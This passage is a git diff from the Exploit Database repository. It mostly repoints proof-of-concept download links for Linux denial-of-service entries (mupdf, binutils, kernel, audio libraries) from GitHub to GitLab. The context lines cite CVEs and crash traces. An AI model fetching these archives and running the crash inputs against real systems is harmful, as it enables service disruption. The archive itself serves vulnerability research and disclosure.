CVE-2015-8396.dcm */ diff --git a/exploits/linux/dos/39454.txt b/exploits/linux/dos/39454.txt index b8d11e9ee..cdae38083 100644 --- a/exploits/linux/dos/39454.txt +++ b/exploits/linux/dos/39454.txt @@ -30,4 +30,4 @@ installation and use of the POC code. Proof of Concept: https://github.com/fjserna/CVE-2015-7547/archive/master.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39454-1.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39454-1.zip \ No newline at end of file diff --git a/exploits/linux/dos/39491.txt b/exploits/linux/dos/39491.txt index 63247da8d..d518ebcef 100644 --- a/exploits/linux/dos/39491.txt +++ b/exploits/linux/dos/39491.txt @@ -78,4 +78,4 @@ The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758605. Att Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39491.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39491.zip \ No newline at end of file diff --git a/exploits/linux/dos/39492.txt b/exploits/linux/dos/39492.txt index 1b5b218ce..e6b90ffb4 100644 --- a/exploits/linux/dos/39492.txt +++ b/exploits/linux/dos/39492.txt @@ -81,4 +81,4 @@ The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758589. Att Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39492.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39492.zip \ No newline at end of file diff --git a/exploits/linux/dos/39493.txt b/exploits/linux/dos/39493.txt index 56c42e83c..3b2de1aa7 100644 --- a/exploits/linux/dos/39493.txt +++ b/exploits/linux/dos/39493.txt @@ -64,4 +64,4 @@ The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758588. Att Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39493.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39493.zip \ No newline at end of file diff --git a/exploits/linux/dos/39494.txt b/exploits/linux/dos/39494.txt index 94899060f..4375e238f 100644 --- a/exploits/linux/dos/39494.txt +++ b/exploits/linux/dos/39494.txt @@ -74,4 +74,4 @@ The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758606. Att Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39494.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39494.zip \ No newline at end of file diff --git a/exploits/linux/dos/39545.txt b/exploits/linux/dos/39545.txt index a471c3892..169f75872 100644 --- a/exploits/linux/dos/39545.txt +++ b/exploits/linux/dos/39545.txt @@ -19,4 +19,4 @@ Correction: IPT_SO_SET_REPLACE is reached via setsockopt, not ioctl! Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39545.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39545.zip \ No newline at end of file diff --git a/exploits/linux/dos/39638.txt b/exploits/linux/dos/39638.txt index 5b588a20c..4b6a1b59a 100644 --- a/exploits/linux/dos/39638.txt +++ b/exploits/linux/dos/39638.txt @@ -69,4 +69,4 @@ Public Advisory: March 30th, 2016 Proof of Concept: https://census-labs.com/media/seas-trigger.packet -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39638.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39638.zip \ No newline at end of file diff --git a/exploits/linux/dos/39733.py b/exploits/linux/dos/39733.py index c934f6cd5..1f3d7ea49 100755 --- a/exploits/linux/dos/39733.py +++ b/exploits/linux/dos/39733.py @@ -32,4 +32,4 @@ def main(): if __name__ == "__main__": - main() + main() \ No newline at end of file diff --git a/exploits/linux/dos/39773.txt b/exploits/linux/dos/39773.txt index df0e6efcd..cb2afcc7a 100644 --- a/exploits/linux/dos/39773.txt +++ b/exploits/linux/dos/39773.txt @@ -78,4 +78,4 @@ Fixed in https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39773.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39773.zip \ No newline at end of file diff --git a/exploits/linux/dos/39940.txt b/exploits/linux/dos/39940.txt index f51ffc74f..285cab489 100644 --- a/exploits/linux/dos/39940.txt +++ b/exploits/linux/dos/39940.txt @@ -101,4 +101,4 @@ Attached are six proof of concept PDF files: three derived from an original file Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39940.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39940.zip \ No newline at end of file diff --git a/exploits/linux/dos/39941.txt b/exploits/linux/dos/39941.txt index 7b99c5002..6a0f2fb1c 100644 --- a/exploits/linux/dos/39941.txt +++ b/exploits/linux/dos/39941.txt @@ -109,4 +109,4 @@ Attached is a proof of concept PDF file. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39941.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39941.zip \ No newline at end of file diff --git a/exploits/linux/dos/39942.txt b/exploits/linux/dos/39942.txt index 81b2c88be..1c636e028 100644 --- a/exploits/linux/dos/39942.txt +++ b/exploits/linux/dos/39942.txt @@ -115,4 +115,4 @@ Attached is a proof of concept PDF file. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39942.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39942.zip \ No newline at end of file diff --git a/exploits/linux/dos/39943.txt b/exploits/linux/dos/39943.txt index 8c88e1bf2..0016d7619 100644 --- a/exploits/linux/dos/39943.txt +++ b/exploits/linux/dos/39943.txt @@ -119,4 +119,4 @@ Attached is a proof of concept PDF file. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39943.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39943.zip \ No newline at end of file diff --git a/exploits/linux/dos/39944.txt b/exploits/linux/dos/39944.txt index e52babd18..61731e49b 100644 --- a/exploits/linux/dos/39944.txt +++ b/exploits/linux/dos/39944.txt @@ -154,4 +154,4 @@ Attached are three further files which reproduce the crash (note that MALLOC_CHE Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39944.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39944.zip \ No newline at end of file diff --git a/exploits/linux/dos/39961.txt b/exploits/linux/dos/39961.txt index 6ee5be5b3..cecae413c 100644 --- a/exploits/linux/dos/39961.txt +++ b/exploits/linux/dos/39961.txt @@ -161,4 +161,4 @@ Updated POC to work on the latest asan linux build, command buffer ids were out Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39961.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39961.zip \ No newline at end of file diff --git a/exploits/linux/dos/40291.txt b/exploits/linux/dos/40291.txt index 9b266e997..08b2630b2 100644 --- a/exploits/linux/dos/40291.txt +++ b/exploits/linux/dos/40291.txt @@ -6,7 +6,7 @@ # CVE: CVE-2016-6855 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40291.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40291.zip Reported: 19-August-2016 diff --git a/exploits/linux/dos/41715.txt b/exploits/linux/dos/41715.txt index d41d485b7..c20a7ed15 100644 --- a/exploits/linux/dos/41715.txt +++ b/exploits/linux/dos/41715.txt @@ -132,9 +132,4 @@ ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsysca Tested on: =============== -Linux Ubuntu x86_64 - - - - - +Linux Ubuntu x86_64 \ No newline at end of file diff --git a/exploits/linux/dos/42138.txt b/exploits/linux/dos/42138.txt index bd6919375..3bad7df8d 100644 --- a/exploits/linux/dos/42138.txt +++ b/exploits/linux/dos/42138.txt @@ -42,4 +42,4 @@ SUMMARY: AddressSanitizer: SEGV XYZ/mupdf/source/fitz/draw-paint.c:1948:2 in fz_ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42138.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42138.zip \ No newline at end of file diff --git a/exploits/linux/dos/42139.txt b/exploits/linux/dos/42139.txt index 2a98247ab..d6171725e 100644 --- a/exploits/linux/dos/42139.txt +++ b/exploits/linux/dos/42139.txt @@ -97,4 +97,4 @@ https://blogs.gentoo.org/ago/2017/02/17/mupdf-mujstest-stack-based-buffer-overfl Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42139.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42139.zip \ No newline at end of file diff --git a/exploits/linux/dos/42147.txt b/exploits/linux/dos/42147.txt index 7657e598d..dfc5eb636 100644 --- a/exploits/linux/dos/42147.txt +++ b/exploits/linux/dos/42147.txt @@ -66,4 +66,4 @@ qflb.wu () dbappsecurity com cn Proofs of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42147.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42147.zip \ No newline at end of file diff --git a/exploits/linux/dos/42148.txt b/exploits/linux/dos/42148.txt index 4e6cbe986..49fa0f0d7 100644 --- a/exploits/linux/dos/42148.txt +++ b/exploits/linux/dos/42148.txt @@ -394,4 +394,4 @@ qflb.wu () dbappsecurity com cn Proofs of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42148.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42148.zip \ No newline at end of file diff --git a/exploits/linux/dos/42162.txt b/exploits/linux/dos/42162.txt index a2cb97b3e..c68c182d9 100644 --- a/exploits/linux/dos/42162.txt +++ b/exploits/linux/dos/42162.txt @@ -34,4 +34,4 @@ Thread T1 (typefind:sink) created by T0 here: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42162.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42162.zip \ No newline at end of file diff --git a/exploits/linux/dos/42198.txt b/exploits/linux/dos/42198.txt index 06f0e7501..f1c4ec502 100644 --- a/exploits/linux/dos/42198.txt +++ b/exploits/linux/dos/42198.txt @@ -40,4 +40,4 @@ The command used was `objdump -D <file>`. The compilation flags used were `-g -O Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42198.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42198.zip \ No newline at end of file diff --git a/exploits/linux/dos/42199.txt b/exploits/linux/dos/42199.txt index f1fbd6c1e..339ad3a6a 100644 --- a/exploits/linux/dos/42199.txt +++ b/exploits/linux/dos/42199.txt @@ -75,4 +75,4 @@ The command used was `objdump -D <file>`. The compilation flags used were `-g -O Proofs of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42199.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42199.zip \ No newline at end of file diff --git a/exploits/linux/dos/42200.txt b/exploits/linux/dos/42200.txt index 3f742e00e..e9a938d96 100644 --- a/exploits/linux/dos/42200.txt +++ b/exploits/linux/dos/42200.txt @@ -38,4 +38,4 @@ The command used was `objdump -D <file>`. The compilation flags used were `-g -O Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42200.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42200.zip \ No newline at end of file diff --git a/exploits/linux/dos/42201.txt b/exploits/linux/dos/42201.txt index bda93d94d..1c78dcfce 100644 --- a/exploits/linux/dos/42201.txt +++ b/exploits/linux/dos/42201.txt @@ -67,4 +67,4 @@ The command used was `objdump -D <file>`. The compilation flags used were `-g -O Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42201.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42201.zip \ No newline at end of file diff --git a/exploits/linux/dos/42202.txt b/exploits/linux/dos/42202.txt index 92cddf225..2c08bc036 100644 --- a/exploits/linux/dos/42202.txt +++ b/exploits/linux/dos/42202.txt @@ -34,4 +34,4 @@ The command used was `objdump -D <file>`. The compilation flags used were `-g -O Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42202.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42202.zip \ No newline at end of file diff --git a/exploits/linux/dos/42203.txt b/exploits/linux/dos/42203.txt index e086b00d7..162635b50 100644 --- a/exploits/linux/dos/42203.txt +++ b/exploits/linux/dos/42203.txt @@ -40,4 +40,4 @@ The command used was `objdump -D <file>`. The compilation flags used were `-g -O Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42203.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42203.zip \ No newline at end of file diff --git a/exploits/linux/dos/42204.txt b/exploits/linux/dos/42204.txt index eb3a5b41e..7ffa553b9 100644 --- a/exploits/linux/dos/42204.txt +++ b/exploits/linux/dos/42204.txt @@ -41,4 +41,4 @@ Error in "aarch64_ext_ldst_reglist": global-buffer-overflow Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42204.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42204.zip \ No newline at end of file diff --git a/exploits/linux/dos/42207.txt b/exploits/linux/dos/42207.txt index 5bf2ca707..665cb36a3 100644 --- a/exploits/linux/dos/42207.txt +++ b/exploits/linux/dos/42207.txt @@ -49,4 +49,4 @@ CVE-2017-9130 =============================== Proofs of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42207.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42207.zip \ No newline at end of file diff --git a/exploits/linux/dos/42258.txt b/exploits/linux/dos/42258.txt index 24292731a..c974f145a 100644 --- a/exploits/linux/dos/42258.txt +++ b/exploits/linux/dos/42258.txt @@ -88,4 +88,4 @@ This bug was found with American Fuzzy Lop. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42258.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42258.zip \ No newline at end of file diff --git a/exploits/linux/dos/42259.txt b/exploits/linux/dos/42259.txt index 57c152ed1..e4511250f 100644 --- a/exploits/linux/dos/42259.txt +++ b/exploits/linux/dos/42259.txt @@ -88,4 +88,4 @@ https://blogs.gentoo.org/ago/2017/06/17/lame-stack-based-buffer-overflow-in-iii_ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42259.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42259.zip \ No newline at end of file diff --git a/exploits/linux/dos/42299.txt b/exploits/linux/dos/42299.txt index f305e28f3..a06ceb532 100644 --- a/exploits/linux/dos/42299.txt +++ b/exploits/linux/dos/42299.txt @@ -84,4 +84,4 @@ more info about the team, the tool or the vulnerability. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42299.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42299.zip \ No newline at end of file diff --git a/exploits/linux/dos/42300.txt b/exploits/linux/dos/42300.txt index c76511f9c..b3bcffd47 100644 --- a/exploits/linux/dos/42300.txt +++ b/exploits/linux/dos/42300.txt @@ -39,4 +39,4 @@ info about the team, the tool or the vulnerability. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42300.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42300.zip \ No newline at end of file diff --git a/exploits/linux/dos/42301.txt b/exploits/linux/dos/42301.txt index d5795ab69..3419f5766 100644 --- a/exploits/linux/dos/42301.txt +++ b/exploits/linux/dos/42301.txt @@ -88,4 +88,4 @@ Segmentation fault Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42301.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42301.zip \ No newline at end of file diff --git a/exploits/linux/dos/42386.txt b/exploits/linux/dos/42386.txt index 798b8675b..44db5249e 100644 --- a/exploits/linux/dos/42386.txt +++ b/exploits/linux/dos/42386.txt @@ -13,4 +13,4 @@ Tested on the following configurations Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42386.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42386.zip \ No newline at end of file diff --git a/exploits/linux/dos/42389.txt b/exploits/linux/dos/42389.txt index 4f8fe6ecd..5644fa6ad 100644 --- a/exploits/linux/dos/42389.txt +++ b/exploits/linux/dos/42389.txt @@ -207,4 +207,4 @@ CVE-2017-9260 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42389.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42389.zip \ No newline at end of file diff --git a/exploits/linux/dos/42390.txt b/exploits/linux/dos/42390.txt index d32354985..e16273ae2 100644 --- a/exploits/linux/dos/42390.txt +++ b/exploits/linux/dos/42390.txt @@ -188,4 +188,4 @@ CVE-2017-9412 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42390.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42390.zip \ No newline at end of file diff --git a/exploits/linux/dos/42391.txt b/exploits/linux/dos/42391.txt index e4d378091..f13795b1d 100644 --- a/exploits/linux/dos/42391.txt +++ b/exploits/linux/dos/42391.txt @@ -138,4 +138,4 @@ CVE-2017-9614 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42391.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42391.zip \ No newline at end of file diff --git a/exploits/linux/dos/42396.txt b/exploits/linux/dos/42396.txt index d2305db02..695a81836 100644 --- a/exploits/linux/dos/42396.txt +++ b/exploits/linux/dos/42396.txt @@ -93,4 +93,4 @@ CVE-2017-11330 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42396.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42396.zip \ No newline at end of file diff --git a/exploits/linux/dos/42397.txt b/exploits/linux/dos/42397.txt index 585d27fb7..a0ad2f4ac 100644 --- a/exploits/linux/dos/42397.txt +++ b/exploits/linux/dos/42397.txt @@ -62,4 +62,4 @@ CVE-2017-11331 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42397.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42397.zip \ No newline at end of file diff --git a/exploits/linux/dos/42398.txt b/exploits/linux/dos/42398.txt index 0080d7361..8d658ed18 100644 --- a/exploits/linux/dos/42398.txt +++ b/exploits/linux/dos/42398.txt @@ -267,4 +267,4 @@ CVE-2017-11359 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42398.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42398.zip \ No newline at end of file diff --git a/exploits/linux/dos/42399.txt b/exploits/linux/dos/42399.txt index eecf2a776..f1bfa081a 100644 --- a/exploits/linux/dos/42399.txt +++ b/exploits/linux/dos/42399.txt @@ -184,4 +184,4 @@ CVE-2017-11735 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42399.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42399.zip \ No newline at end of file diff --git a/exploits/linux/dos/42400.txt b/exploits/linux/dos/42400.txt index 3fbe0c3d7..1f6593c01 100644 --- a/exploits/linux/dos/42400.txt +++ b/exploits/linux/dos/42400.txt @@ -59,4 +59,4 @@ CVE-2017-11548 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42400.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42400.zip \ No newline at end of file diff --git a/exploits/linux/dos/42409.txt b/exploits/linux/dos/42409.txt index b4748f96b..841c43ec5 100644 --- a/exploits/linux/dos/42409.txt +++ b/exploits/linux/dos/42409.txt @@ -57,4 +57,4 @@ CVE-2017-11552 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42409.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42409.zip \ No newline at end of file diff --git a/exploits/linux/dos/42433.txt b/exploits/linux/dos/42433.txt index 55809f7b6..08f0880e3 100644 --- a/exploits/linux/dos/42433.txt +++ b/exploits/linux/dos/42433.txt @@ -352,4 +352,4 @@ https://github.com/Mindwerks/wildmidi/commit/660b513d99bced8783a4a5984ac2f742c74 POC: ========== https://github.com/Mindwerks/wildmidi/files/1186857/poc.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42433.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42433.zip \ No newline at end of file diff --git a/exploits/linux/dos/42546.txt b/exploits/linux/dos/42546.txt index e0b455664..fe44b66d2 100644 --- a/exploits/linux/dos/42546.txt +++ b/exploits/linux/dos/42546.txt @@ -584,4 +584,4 @@ CVE-2017-12954 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42546.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42546.zip \ No newline at end of file diff --git a/exploits/linux/dos/42600.txt b/exploits/linux/dos/42600.txt index 1e91c3266..a7dcb4bb9 100644 --- a/exploits/linux/dos/42600.txt +++ b/exploits/linux/dos/42600.txt @@ -83,4 +83,4 @@ Shadow byte legend (one shadow byte represents 8 application bytes): Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42600.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42600.zip \ No newline at end of file diff --git a/exploits/linux/dos/42652.txt b/exploits/linux/dos/42652.txt index d9c26223a..d97035ac9 100644 --- a/exploits/linux/dos/42652.txt +++ b/exploits/linux/dos/42652.txt @@ -80,4 +80,4 @@ eflags=0x000102 /lib/i386-linux-gnu/libgcc_s.so.1=0xb7a33000 /lib/i386-linux-gnu/libm.so.6=0xb7c2e000 /lib/i386-linux-gnu/libc.so.6=0xb7a77000 -/lib/ld-linux.so.2=0xb7a51000> +/lib/ld-linux.so.2=0xb7a51000> \ No newline at end of file diff --git a/exploits/linux/dos/42762.txt b/exploits/linux/dos/42762.txt index e17312962..ccc2f2795 100644 --- a/exploits/linux/dos/42762.txt +++ b/exploits/linux/dos/42762.txt @@ -294,4 +294,4 @@ bt.recv() DEMO: -https://imgur.com/a/zcvLb +https://imgur.com/a/zcvLb \ No newline at end of file diff --git a/exploits/linux/dos/42970.txt b/exploits/linux/dos/42970.txt index f469471ff..a94f99cd3 100644 --- a/exploits/linux/dos/42970.txt +++ b/exploits/linux/dos/42970.txt @@ -91,7 +91,7 @@ CVE-2017-14939 Reproducer: https://github.com/asarubbo/poc/blob/master/00370-binutils-heapoverflow-read_1_byte -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42970.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42970.zip Timeline: 2017-09-21: bug discovered and reported to upstream @@ -109,4 +109,4 @@ https://blogs.gentoo.org/ago/2017/09/26/binutils-heap-based-buffer-overflow-in-r Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42970.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42970.zip \ No newline at end of file diff --git a/exploits/linux/dos/43014.txt b/exploits/linux/dos/43014.txt index 884edfd88..191879471 100644 --- a/exploits/linux/dos/43014.txt +++ b/exploits/linux/dos/43014.txt @@ -283,4 +283,4 @@ which would mean that this is a potentially exploitable issue in release builds. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43014.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43014.zip \ No newline at end of file diff --git a/exploits/linux/dos/43322.txt b/exploits/linux/dos/43322.txt index e8a03d1b5..78dbe335c 100644 --- a/exploits/linux/dos/43322.txt +++ b/exploits/linux/dos/43322.txt @@ -388,4 +388,4 @@ Program terminated with signal SIGSEGV, Segmentation fault. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43322.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43322.zip \ No newline at end of file diff --git a/exploits/linux/dos/44254.py b/exploits/linux/dos/44254.py index 209410e8a..d08605fd9 100755 --- a/exploits/linux/dos/44254.py +++ b/exploits/linux/dos/44254.py @@ -1,5 +1,5 @@ # Written by Alex Conrey -# Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44254.zip +# Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44254.zip # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by diff --git a/exploits/linux/dos/44265.py b/exploits/linux/dos/44265.py index 77a456cb4..cb4f085ec 100755 --- a/exploits/linux/dos/44265.py +++ b/exploits/linux/dos/44265.py @@ -1,6 +1,6 @@ #-- coding: utf8 -- #!/usr/bin/python -# Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44265.zip +# Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44265.zip import sys, os, time, shodan from pathlib import Path diff --git a/exploits/linux/dos/44490.txt b/exploits/linux/dos/44490.txt index 0bceb2c78..d3d46707a 100644 --- a/exploits/linux/dos/44490.txt +++ b/exploits/linux/dos/44490.txt @@ -65,4 +65,4 @@ pdfunite version 0.41.0 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44490.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44490.zip \ No newline at end of file diff --git a/exploits/linux/dos/44519.txt b/exploits/linux/dos/44519.txt index e97e647d6..ab92674c2 100644 --- a/exploits/linux/dos/44519.txt +++ b/exploits/linux/dos/44519.txt @@ -88,4 +88,4 @@ https://github.com/0xshyam/hamm3r.py Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44519.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44519.zip \ No newline at end of file diff --git a/exploits/linux/dos/45268.txt b/exploits/linux/dos/45268.txt index 146c89e4f..4d2a00ffc 100644 --- a/exploits/linux/dos/45268.txt +++ b/exploits/linux/dos/45268.txt @@ -6,4 +6,4 @@ This issue reproduces on Chrome and Firefox for Linux. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45268.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45268.zip \ No newline at end of file diff --git a/exploits/linux/dos/46626.txt b/exploits/linux/dos/46626.txt index 07c0a3068..13f91a3fe 100644 --- a/exploits/linux/dos/46626.txt +++ b/exploits/linux/dos/46626.txt @@ -155,4 +155,4 @@ And they added a testcase I made to their testsuite. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46626.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46626.zip \ No newline at end of file diff --git a/exploits/linux/dos/47178.txt b/exploits/linux/dos/47178.txt index 708436216..e3cd70ebe 100644 --- a/exploits/linux/dos/47178.txt +++ b/exploits/linux/dos/47178.txt @@ -81,4 +81,4 @@ int pdf_load_xrefs(FILE *fp, pdf_t *pdf) This is a crafted PDF 